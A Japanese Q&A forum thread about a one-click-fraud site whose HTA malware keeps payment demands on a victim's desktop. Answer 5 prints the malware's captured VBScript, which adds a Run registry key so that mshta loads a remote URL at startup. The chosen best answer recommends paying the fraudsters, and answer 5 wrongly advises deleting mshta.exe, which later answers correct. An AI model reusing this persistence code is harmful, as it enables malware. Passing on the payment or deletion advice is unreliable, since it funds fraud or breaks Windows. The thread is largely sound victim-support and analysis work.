• ベストアンサー
※ ChatGPTを利用し、要約された質問です(原文:「変態愛好家」というサイトに登録してしまいました。。。)

「変態愛好家」というサイトに登録してしまいました

このQ&Aのポイント
  • ネットサーフィン中に興味本位でクリックしてしまったサイトに登録してしまった結果、高額な請求をされています。
  • 「変態愛好家」さんはデスクトップに恥ずかしい広告を張り付けたままにしており、邪魔です。
  • 支払いはしたくないので他の対処方法を考えていますが、利用規約で登録と課金が明記されているため、支払う義務があるか悩んでいます。

質問者が選んだベストアンサー

  • ベストアンサー
回答No.8

最良の解決方法は支払って2度と同じ過ちを繰り返さないことだと思います。 お金払えばちゃんと広告は消えてくれるはずなので。 それで消えなければ完全な悪質サイトです。 サイトを見てないのでどれだけの金額を請求されているのかわかりませんので金額にもよると思いますが、僕は"対策のフリーソフトを使ってPCが起動できない状態"になったことがあります。 PCが壊れたことを考えると支払った方がはるかにお得でした。。。 もちろんPCに詳しい方に相談できるのでしたらそれからでもいいとは思うのですが、2次被害にあった僕のような人もいるのでそういう可能性も考えてみてください。

yoshino_tomo
質問者

お礼

支払ったら広告は消えてくれました。 おっしゃる通り、それでPCが壊れたら何倍もの損をすることになるので授業料だと思ってます。 まあ金銭的にはそこまで問題ではないのですが、PCに侵入されたのが気分悪いです。 これからしっかり気をつけてネットやろうと思います。

その他の回答 (8)

  • ttt8300
  • ベストアンサー率42% (3/7)
回答No.9

>>1、利用することに承諾するチェックを入れてしまった >>2、利用規約にクリックした時点で登録され、課金が発生することが明記してある 動画ファイルをダウンロードさせると思わせて、「htaワンクリックウェア」をダウンロードさせるワンクリックウェアサイトである認識はありますか? 1.私は20歳以上で、今現在使っているパソコンは自分のもので他人や会社のものではありません。 はい いいえ 2.ダウンロードページに進むには、錯誤が無いようにサイトの利用規約に必ず同意した上で進みます。 はい いいえ 3.私は上記確認と利用規約に同意したうえで、動画ページへ進みます。 上記の作業を2回くり返し、動画ページに移動しています。 動画ページでサムネイルをクリックすると、動画ファイルをダウンロードさせると思わせて、「htaワンクリックウェア」をダウンロードするダイアログが出てきて、何も知らないあなたは実行をクリック・・・はい、感染。 >>自分で承諾している形なので支払う義務があるんじゃないかと思いまして。 有料番組利用契約申込みボタンが何処にもありません。 あるのは、「1.私は20歳以上で、今現在使っているパソコンは自分のもので他人や会社のものではありません。はい いいえ」と「2.ダウンロードページに進むには、錯誤が無いようにサイトの利用規約に必ず同意した上で進みます。はい いいえ」、「3.私は上記確認と利用規約に同意したうえで、動画ページへ進みます。」 というものだけです。 これが、まともな契約行為だと言うのですか? インターネット通販における「意に反して契約の申込みをさせようとする行為」に係るガイドラインについて http://www.meti.go.jp/policy/economy/consumer/consumer/tokutei/ecrule/guideline.htm 「顧客の意に反して契約の申込みをさせようとする行為」の具体的内容 http://www.meti.go.jp/policy/economy/consumer/consumer/tokutei/ecrule/order.htm 契約を申し込んでいないのですから、支払い義務もありません。

yoshino_tomo
質問者

お礼

回答ありがとうございました! しかしながら法的な問題云々もそうなんですけど、それよりも変なプログラムが一度入り込んだという事実がいやですよね。 実際似たようなプログラムにPC破壊されたりすることもあるので、今回は授業料だと思って支払いました。PC壊れたらその何倍も損することになるので。 支払いと同時に広告も消えましたが、これもこれでなんかいやな感じです。。。 二度と引っかからないように気をつけたいと思います。

  • qwerjpo
  • ベストアンサー率44% (39/88)
回答No.7

すみません、調べたら確かにシステムファイルだったようです。 http://internet.watch.impress.co.jp/cda/news/2009/04/09/23089.html 危ない危ない。 誤った情報を流してしまってすみませんでした。

参考URL:
http://internet.watch.impress.co.jp/cda/news/2009/04/09/23089.html
  • morimu
  • ベストアンサー率27% (62/224)
回答No.6

NO.5さんの回答で それと、できれば本体のファイル「c:\Windows \system32\mshta.exe」を削除しておいた方が良いです。 ですがmahta.exeはマイクロソフトの正規の ファイルなので削除してはいけません。 正規ファイルを使ってエロエロな画面を 出しているんです。

  • qwerjpo
  • ベストアンサー率44% (39/88)
回答No.5

すみません。再度トライしてみたらIEでサーバに接続させたときにレジストリにスタートアップが登録されるようになっていました。 以下パケットキャプチャから取得した情報から抜粋 <Script Language="VBScript"> On Error Resume Next winwidth = 600 winheight = 400 window.resizeTo winwidth, winheight positionX = ( screen.availWidth - winwidth ) / 2 positionY = ( screen.availHeight - winheight ) / 2 window.moveTo positionX, positionY Dim WshShell Set WshShell = CreateObject( "WScript.Shell" ) Dim WindowsDirectory WindowsDirectory = WshShell.ExpandEnvironmentStrings( "%SystemRoot%" ) WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start_0d3851411c3a681fadd058efe2d95ecef336cf7a", WindowsDirectory & "\system32\mshta http://www.**-******-**.net/pc/page/player_view.php?code=&cuid=0d3851411c3a681fadd058efe2d95ecef336cf7a", "REG_SZ" WshShell.Run "wmplayer.exe http://www.**-******-**.net/movie/sample_1.wmv", 4, False Window.Open "http://www.**-******-**.net/pc/page/allot.php?code=&cuid=0d3851411c3a681fadd058efe2d95ecef336cf7a&ckg=on&ln=/movie_list" </Script> なので、このレジストリキーを削除してみてください。たぶんもう起動しなくなると思います。 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start_0d3851411c3a681fadd058efe2d95ecef336cf7a それと、できれば本体のファイル「c:\Windows\system32\mshta.exe」を削除しておいた方が良いです。

  • qwerjpo
  • ベストアンサー率44% (39/88)
回答No.4

自分で探してダウンロードしてあえて感染させて調べてみました。 結論:リカバリ これは僕のスキルでは全部解析するの無理。orz 実際に動かしているのにKasperskyは検知しないし、 大元のファイルをVirusTotalでやってもどれも検知しないし。 これはかなり詳しい方でなければ修復するのは難しいのでリカバリをおすすめします。

noname#140925
noname#140925
回答No.3

以下のソフトでスタートアップをチェックしてみましょう。 怪しいのがあれば無効化。 プロセス調べて同じ物があれば強制終了。 [参考]Vector:スタートアップチェッカー - お勧めソフトPickUP http://www.vector.co.jp/vpack/browse/pickup/pw7/pw007026.html 入れておくと、次回から同じような手口でやられそうになっても、スタートアップに登録された時点で警告してくれます。

  • qwerjpo
  • ベストアンサー率44% (39/88)
回答No.2

とりあえず請求はほっとく。 どーせ個人の情報なんか知り得ないんだし。 で、問題の広告ですが、何かしらスタートアップに登録されているはずなので、 Autorunsなどで最近追加されたスタートアップをしらべてみてはどうでしょう? どうしても分からなければURLを教えてください。 こちらで調べますので。

回答No.1

支払い警告画面が数分おきに出る!! そういう方はいませんか? どうやらワンクリウェア(スパイウェア)が侵入したみたいですね。 早急にパソコンのチェック及びワンクリウェアの削除を行うべきでしょう。 対応サイトであれば、以下の物も使えます。(自己責任でお使い下さい) ワンクリウェア駆除ツール(test版)更新停止中 http://sasi40dx.cs.land.to/ [ダウンロードはここをクリック]でダウンロードが始まります。 保存されたファイルをダブルクリックして自己解凍後、作成された「del_1cw」フォルダ内の「del_1cw.bat」をダブルクリックします。あとは画面指示に従って[ダイアログ]をクリックしていけばOKです。 ※ 削除する際、PCの知識がある程度ありませんと大切なデータを破壊する恐れがあります。 自分で出来そうに無い時は、PCに精通した友人・知人に頼むか、最寄りパソコンショップの有料出張修理サービス等を利用・お願いするか、購入先に問い合わせるのも良いでしょう。 PC知識がお有りでしたら上で紹介したサイトに移動して、参考になさって下さい。 なお、システムの復元を奨める方がいらっしゃるようですが、実はかえってパソコンを不安定にしたり、おかしくなったりする危険性が指摘されていますので、私は奨めません。 システムの復元の危険性 http://pasofaq.jp/windows/admintools/rstrui.htm 私が初めてワンクリック詐欺に遭った時、まず真っ先に契約しているプロバイダへ相談しました。(本当にIPアドレスから個人特定が可能なのか?支払う必要があるのか?など質問) その後、相談掲示板を発見し、自分と似たような相談が無いのか?を確認しましたら同じ物があり、その中身を見ましたが、「果たしてその回答は正しいのか?」と疑問に感じたので最寄りの消費者センターに「自分の足で」行き「面談で」相談し、ようやく理解することができました。 ですから、わざわざ新規で相談せずに済みました。 「自分は特別なのか?」と、思いがちですがそんな事はありません。 私の他の相談者への回答を見れば解かりますが、ほとんど同じ回答をしております。 サイト名で判断せずに手口で判断しましょう。 そうしませんと、再度ワンクリに掛かり、同じような質問を繰り返すことに。 不安なのは理解できますが、まずは落ち着いて彼方此方の相談サイトを調べたり、プロバイダに確認したり携帯電話で被害に遭ったのであれば携帯電話会社に相談するなりして自分で調べる努力を。ネットの掲示板で見ず知らずの人から言われるよりも「説得力」「安心感」が違います。 また、慌てすぎてそういった方法すら思い付かない人に、公的機関やプロバイダ・携帯電話会社へ相談するように奨めるのも我々アドバイザーの仕事の1つであると私は思います。 公的機関などに聞くのが1番安心出来ることでしょう。

関連するQ&A

専門家に質問してみよう